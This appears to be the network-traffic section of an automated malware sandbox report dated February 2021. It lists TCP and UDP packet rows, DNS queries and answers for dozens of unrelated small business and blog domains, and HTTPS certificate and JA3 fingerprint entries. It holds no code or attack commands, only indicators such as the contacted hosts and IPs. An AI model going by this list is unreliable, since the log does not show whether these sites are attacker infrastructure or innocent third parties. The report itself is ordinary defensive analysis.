                                                                                                                                                          Feb 16, 2021 04:32:00.257256031 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.257297039 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.257339954 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.257416010 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.262803078 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.327907085 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.335095882 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.335150003 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.402363062 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664527893 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664644957 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664712906 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664779902 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664879084 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.664948940 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.665030956 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.665059090 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.665069103 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.665108919 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.665149927 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.665226936 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.730042934 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730139017 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730216980 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730305910 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730370998 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730459929 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730479956 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.730499983 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730540037 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730577946 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730613947 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730645895 CET44349773155.133.142.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:00.730678082 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.730881929 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:00.731576920 CET49773443192.168.2.3155.133.142.13
                                                                                                                                                          Feb 16, 2021 04:32:07.570971966 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.684636116 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.684683084 CET44349779116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.848795891 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.849034071 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:07.850111961 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.126059055 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127357960 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127417088 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127537966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.127559900 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.136682034 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.413228035 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:08.455539942 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:08.704530001 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.018476963 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276645899 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276709080 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276750088 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276787996 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276810884 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.276839018 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276875973 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.276885033 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276926041 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276962042 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.276981115 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.277017117 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.444510937 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.444576979 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.444663048 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553421021 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553498983 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553529978 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553563118 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553603888 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553622961 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553644896 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553658962 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553700924 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553741932 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553757906 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553791046 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553836107 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553852081 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553874969 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.553884983 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.553977966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554042101 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.554106951 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554265022 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554307938 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.554322958 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.554419041 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.556569099 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.719660997 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719722033 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719770908 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.719805002 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.719815016 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.720746994 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.829663038 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829727888 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829766989 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829823971 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.829869032 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.829973936 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830035925 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830094099 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830136061 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830144882 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830296040 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830351114 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830368996 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830451012 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830509901 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830586910 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830631018 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830694914 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.830775023 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.830825090 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.831103086 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832307100 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832406998 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832467079 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832509995 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832586050 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832649946 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832696915 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832839966 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832880974 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832905054 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.832921982 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.832973003 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833003044 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833046913 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833116055 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833197117 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833252907 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833297014 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833336115 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:09.833350897 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.833405018 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.836952925 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:09.837025881 CET49780443192.168.2.3116.90.53.15
                                                                                                                                                          Feb 16, 2021 04:32:10.114310026 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.114357948 CET44349780116.90.53.15192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.310934067 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.368880987 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.369541883 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.371767998 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.432796001 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456563950 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456650019 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456686020 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.456847906 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.460866928 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.522576094 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.526660919 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.526707888 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.584558964 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585211039 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585248947 CET4434978185.119.82.125192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.585664034 CET49781443192.168.2.385.119.82.125
                                                                                                                                                          Feb 16, 2021 04:32:10.585881948 CET49781443192.168.2.385.119.82.125

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET53576018.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:02.434339046 CET4934253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:02.521812916 CET53493428.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:02.938092947 CET5625353192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:03.004697084 CET53562538.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.442157030 CET4966753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:05.501130104 CET53496678.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.510523081 CET5543953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET53554398.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:05.902743101 CET5706953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:06.292862892 CET53570698.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:07.438323021 CET5765953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:07.531253099 CET53576598.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.228743076 CET5471753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:10.308548927 CET53547178.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:10.612226009 CET6397553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:10.688761950 CET53639758.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.038769960 CET5663953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:11.096082926 CET53566398.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:11.409749985 CET5185653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:11.473970890 CET53518568.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:14.020593882 CET5654653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:14.094110966 CET53565468.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:14.853718996 CET6215253192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:14.913343906 CET53621528.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:15.759876013 CET5347053192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:15.821629047 CET53534708.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:16.417448044 CET5644653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:16.477796078 CET53564468.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:17.119256020 CET5963153192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:17.176754951 CET53596318.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:17.935142994 CET5551553192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:17.995316029 CET53555158.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:18.823540926 CET6454753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:18.883323908 CET53645478.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:20.173671961 CET5175953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:20.230813026 CET53517598.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:21.550698042 CET5920753192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:21.608179092 CET53592078.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:22.312539101 CET5426953192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:22.371629000 CET53542698.8.8.8192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:32:32.500360966 CET5485653192.168.2.38.8.8.8
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET53548568.8.8.8192.168.2.3

DNS Queries


DNS Answers

                                                                                                                                                          Feb 16, 2021 04:32:00.800765038 CET8.8.8.8192.168.2.30x3464Name error (3)conexa4papers.tradenonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.094064951 CET8.8.8.8192.168.2.30xf66bNo error (0)bargningavesta.se104.21.9.188A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.094064951 CET8.8.8.8192.168.2.30xf66bNo error (0)bargningavesta.se172.67.131.4A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com104.26.13.9A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com172.67.68.99A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:01.525939941 CET8.8.8.8192.168.2.30x2a86No error (0)humancondition.com104.26.12.9A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:02.521812916 CET8.8.8.8192.168.2.30x76e9No error (0)thewellnessmimi.com142.93.110.250A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:03.004697084 CET8.8.8.8192.168.2.30xd61cNo error (0)huehnerauge-entfernen.de46.30.215.215A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.501130104 CET8.8.8.8192.168.2.30xfcb8Name error (3)12starhd.onlinenonenoneA (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET8.8.8.8192.168.2.30xeef7No error (0)brandl-blumen.de172.67.222.33A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:05.570014954 CET8.8.8.8192.168.2.30xeef7No error (0)brandl-blumen.de104.21.62.85A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:06.292862892 CET8.8.8.8192.168.2.30x23cbNo error (0)you-bysia.com.au116.90.53.15A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:07.531253099 CET8.8.8.8192.168.2.30x3bf0No error (0)youbysia.com.au116.90.53.15A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.308548927 CET8.8.8.8192.168.2.30x59ecNo error (0)kmbshipping.co.uk85.119.82.125A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:10.688761950 CET8.8.8.8192.168.2.30xa54eNo error (0)www.kmbshipping.co.uk85.119.82.125A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.096082926 CET8.8.8.8192.168.2.30xc5ecNo error (0)idemblogs.com91.121.58.131A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:11.473970890 CET8.8.8.8192.168.2.30x15d1No error (0)nsec.se13.74.136.93A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)havecamerawilltravel2017.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)
                                                                                                                                                          Feb 16, 2021 04:32:32.562433004 CET8.8.8.8192.168.2.30xd53bNo error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:31:44.152694941 CET151.139.128.10443192.168.2.349762CN=transportesycementoshidalgo.es CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 10 07:34:23 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 10 08:34:23 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:44.609890938 CET159.69.118.212443192.168.2.349763CN=digivod.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 09 00:14:34 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 10 01:14:34 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:45.824613094 CET185.98.131.150443192.168.2.349764CN=365questions.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 06 03:47:15 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 06 04:47:15 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:49.660640955 CET83.166.155.153443192.168.2.349765CN=truenyc.co CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 04:16:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 20 05:16:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:52.506124973 CET142.93.110.250443192.168.2.349766CN=ikads.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jan 12 19:16:17 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Apr 12 20:16:17 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:52.856070042 CET94.16.115.81443192.168.2.349767CN=theduke.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 05 06:09:19 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 06 07:09:19 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:53.955204964 CET35.221.46.9443192.168.2.349768CN=manifestinglab.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 17 18:22:17 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 17 18:22:17 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
